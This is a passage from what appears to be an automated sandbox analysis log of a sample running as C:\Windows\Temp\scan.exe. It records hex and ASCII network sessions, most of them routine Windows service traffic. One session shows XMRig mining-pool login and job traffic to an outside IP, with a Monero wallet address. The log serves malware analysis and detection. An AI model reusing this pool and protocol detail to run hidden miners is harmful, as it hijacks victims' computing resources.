                                                                                                          2022-08-13 07:07:31 UTC218OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 64 62 30 65 65 65 63 33 36 30 62 65 38 31 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: 72db0eeec360be81
                                                                                                          2022-08-13 07:07:31 UTC218OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:07:31 UTC219OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 64 62 30 65 65 65 63 33 36 30 62 65 38 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: 72db0eeec360be81<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:07:31 UTC220OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 37 30 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 64 62 30 65 65 65 63 33 36 30 62 65 38 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                          Data Ascii: BND 3 CON\WNS 1044478 170Context: 72db0eeec360be81<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                          2022-08-13 07:07:31 UTC220INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:07:31 UTC220INData Raw: 4d 53 2d 43 56 3a 20 35 71 37 6b 5a 6f 64 61 62 6b 4b 52 39 4e 34 35 4e 36 65 78 79 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: 5q7kZodabkKR9N45N6exyA.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          2192.168.2.74976520.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:09 UTC56OUTPOST /RST2.srf HTTP/1.0
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/soap+xml
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                          Content-Length: 3592
                                                                                                          Host: login.live.com
                                                                                                          2022-08-13 07:07:09 UTC57OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                          2022-08-13 07:07:09 UTC60INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                          Expires: Sat, 13 Aug 2022 07:06:09 GMT
                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                          x-ms-route-info: R3_BL2
                                                                                                          x-ms-request-id: 8b830131-4409-4be2-b447-3c253b235a2c
                                                                                                          PPServer: PPV: 30 H: BL02PF17C21DBC9 V: 0
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          Date: Sat, 13 Aug 2022 07:07:08 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 11299
                                                                                                          2022-08-13 07:07:09 UTC61INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          20192.168.2.74980720.199.120.85443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:42 UTC220OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 38 35 63 64 38 63 62 61 63 34 30 31 37 38 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: 3a85cd8cbac40178
                                                                                                          2022-08-13 07:07:42 UTC220OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:07:42 UTC220OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 38 35 63 64 38 63 62 61 63 34 30 31 37 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: 3a85cd8cbac40178<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:07:42 UTC221OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 38 35 63 64 38 63 62 61 63 34 30 31 37 38 0d 0a 0d 0a
                                                                                                          Data Ascii: BND 3 CON\QOS 29Context: 3a85cd8cbac40178
                                                                                                          2022-08-13 07:07:42 UTC221INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:07:42 UTC221INData Raw: 4d 53 2d 43 56 3a 20 65 61 6c 4f 4e 65 71 30 34 6b 69 36 59 33 4f 34 38 32 73 44 50 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: ealONeq04ki6Y3O482sDPw.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          21192.168.2.74980920.199.120.182443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:51 UTC221OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 32 38 65 62 37 62 38 35 32 35 30 37 30 32 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: c428eb7b85250702
                                                                                                          2022-08-13 07:07:51 UTC221OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:07:51 UTC222OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 32 38 65 62 37 62 38 35 32 35 30 37 30 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: c428eb7b85250702<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:07:51 UTC223OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 37 30 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 32 38 65 62 37 62 38 35 32 35 30 37 30 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                          Data Ascii: BND 3 CON\WNS 1044478 170Context: c428eb7b85250702<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                          2022-08-13 07:07:51 UTC223INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:07:51 UTC223INData Raw: 4d 53 2d 43 56 3a 20 41 41 77 51 46 59 53 46 6e 55 4b 35 43 37 4f 6d 73 49 52 4b 65 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: AAwQFYSFnUK5C7OmsIRKeQ.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          22192.168.2.749810104.140.201.42443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:54 UTC223OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 61 55 73 48 63 43 53 39 58 55 75 38 63 33 77 75 79 58 62 76 67 36 71 72 63 75 76 65 47 63 41 57 57 4a 4c 64 31 34 4e 6e 43 5a 50 6f 32 75 51 71 67 38 46 64 64 68 4a 5a 6a 55 68 73 31 64 31 57 48 42 68 64 63 71 57 76 45 41 65 64 51 69 72 33 61 78 58 34 77 4a 35 68 38 75 75 75 54 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 35 2e 31 31 2e 31 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 31 2e 30 20 67 63 63 2f 31 30 2e 31 2e 30 22 2c 22 61 6c 67 6f 22 3a 5b 22 63
                                                                                                          Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46aUsHcCS9XUu8c3wuyXbvg6qrcuveGcAWWJLd14NnCZPo2uQqg8FddhJZjUhs1d1WHBhdcqWvEAedQir3axX4wJ5h8uuuT","pass":"x","agent":"XMRig/5.11.1 (Windows NT 10.0; Win64; x64) libuv/1.31.0 gcc/10.1.0","algo":["c
                                                                                                          2022-08-13 07:07:54 UTC223INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 38 65 36 34 62 30 62 32 2d 32 30 65 63 2d 34 32 33 36 2d 62 32 37 35 2d 39 30 38 64 38 37 65 64 31 32 63 63 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 65 31 30 38 65 39 62 64 64 39 37 30 36 66 65 63 66 31 32 63 64 37 34 35 65 61 34 62 31 32 37 65 34 36 31 66 38 65 62 32 61 66 62 66 63 62 61 33 64 65 38 31 65 63 64 35 33 64 30 34 36 30 61 30 65 30 33 39 32 62 31 34 64 34 37 36 32 30 30 30 30 30 30 30 30 30 36 61 62 32 65 65 31 38 35 33 34 38 61 63 61 37 63 62 62 61 34 33 35 61 62 35 63 62 32 65 34 64 36 63 65 39 33 66 62 31 64 66 34 37 65 33 62 35 33 39 30 64 66 32 62 38 65 38 66 64 66 34
                                                                                                          Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"8e64b0b2-20ec-4236-b275-908d87ed12cc","job":{"blob":"0e108e9bdd9706fecf12cd745ea4b127e461f8eb2afbfcba3de81ecd53d0460a0e0392b14d47620000000006ab2ee185348aca7cbba435ab5cb2e4d6ce93fb1df47e3b5390df2b8e8fdf4
                                                                                                          2022-08-13 07:07:59 UTC224INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 65 31 30 38 65 39 62 64 64 39 37 30 36 66 65 63 66 31 32 63 64 37 34 35 65 61 34 62 31 32 37 65 34 36 31 66 38 65 62 32 61 66 62 66 63 62 61 33 64 65 38 31 65 63 64 35 33 64 30 34 36 30 61 30 65 30 33 39 32 62 31 34 64 34 37 36 32 30 30 30 30 30 30 30 30 32 38 64 64 36 62 33 63 38 39 61 32 65 63 35 33 31 61 62 37 35 37 33 66 35 33 32 34 32 34 35 32 33 33 37 36 66 34 33 39 33 33 32 66 39 66 66 36 30 33 66 32 64 63 37 61 65 37 64 65 37 36 32 62 32 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 46 46 6e 4d 39 6b 66 46 47 39 44 69 47 4b 42 51 72 4c 46 54 50 59 4c 31 59 6c 55 6e 22 2c 22 74 61 72 67 65 74 22 3a 22 36
                                                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0e108e9bdd9706fecf12cd745ea4b127e461f8eb2afbfcba3de81ecd53d0460a0e0392b14d47620000000028dd6b3c89a2ec531ab7573f532424523376f439332f9ff603f2dc7ae7de762b20","job_id":"FFnM9kfFG9DiGKBQrLFTPYL1YlUn","target":"6
                                                                                                          2022-08-13 07:08:59 UTC229INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 65 31 30 38 65 39 62 64 64 39 37 30 36 66 65 63 66 31 32 63 64 37 34 35 65 61 34 62 31 32 37 65 34 36 31 66 38 65 62 32 61 66 62 66 63 62 61 33 64 65 38 31 65 63 64 35 33 64 30 34 36 30 61 30 65 30 33 39 32 62 31 34 64 34 37 36 32 30 30 30 30 30 30 30 30 66 39 64 62 37 36 64 37 37 61 66 36 36 61 34 36 66 35 37 31 39 36 30 61 66 65 32 62 65 64 65 62 30 61 32 38 62 38 35 63 63 63 63 39 32 63 65 65 65 32 38 30 37 33 32 62 62 62 34 39 61 61 31 65 32 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 38 56 2b 74 78 4b 69 36 61 76 77 32 66 4e 4b 6a 65 64 38 67 42 4b 6f 63 79 79 64 77 22 2c 22 74 61 72 67 65 74 22 3a 22 39
                                                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0e108e9bdd9706fecf12cd745ea4b127e461f8eb2afbfcba3de81ecd53d0460a0e0392b14d476200000000f9db76d77af66a46f571960afe2bedeb0a28b85cccc92ceee280732bbb49aa1e20","job_id":"8V+txKi6avw2fNKjed8gBKocyydw","target":"9
                                                                                                          2022-08-13 07:09:00 UTC229OUTData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6b 65 65 70 61 6c 69 76 65 64 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 38 65 36 34 62 30 62 32 2d 32 30 65 63 2d 34 32 33 36 2d 62 32 37 35 2d 39 30 38 64 38 37 65 64 31 32 63 63 22 7d 7d 0d 0a
                                                                                                          Data Ascii: {"id":2,"jsonrpc":"2.0","method":"keepalived","params":{"id":"8e64b0b2-20ec-4236-b275-908d87ed12cc"}}
                                                                                                          2022-08-13 07:09:00 UTC229INData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 4b 45 45 50 41 4c 49 56 45 44 22 7d 7d 0a
                                                                                                          Data Ascii: {"id":2,"jsonrpc":"2.0","error":null,"result":{"status":"KEEPALIVED"}}
                                                                                                          2022-08-13 07:09:22 UTC232INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 30 65 31 30 61 31 39 63 64 64 39 37 30 36 35 35 31 66 30 39 35 32 39 39 30 35 36 62 33 38 39 66 31 62 62 34 64 37 64 61 30 61 39 30 61 33 35 31 34 33 64 38 61 61 62 62 31 62 33 31 64 39 66 62 34 62 30 61 31 34 31 64 62 31 61 37 35 32 30 30 30 30 30 30 30 30 61 39 35 36 30 37 64 39 36 36 38 37 63 66 33 30 34 33 34 33 33 37 64 34 34 65 63 66 63 66 62 39 37 66 35 62 36 66 37 30 63 33 65 34 66 34 33 63 34 37 64 37 34 64 31 34 32 66 64 34 31 35 33 62 62 65 30 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 55 4d 30 6c 48 66 56 2f 64 4c 63 61 70 57 55 64 6d 74 65 34 51 57 78 6e 68 64 68 2f 22 2c 22 74 61 72 67 65 74 22 3a
                                                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"0e10a19cdd9706551f095299056b389f1bb4d7da0a90a35143d8aabb1b31d9fb4b0a141db1a75200000000a95607d96687cf30434337d44ecfcfb97f5b6f70c3e4f43c47d74d142fd4153bbe01","job_id":"UM0lHfV/dLcapWUdmte4QWxnhdh/","target":


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          23192.168.2.74981120.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:08:05 UTC224OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 63 34 31 35 33 65 62 66 30 62 34 66 63 62 66 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: bc4153ebf0b4fcbf
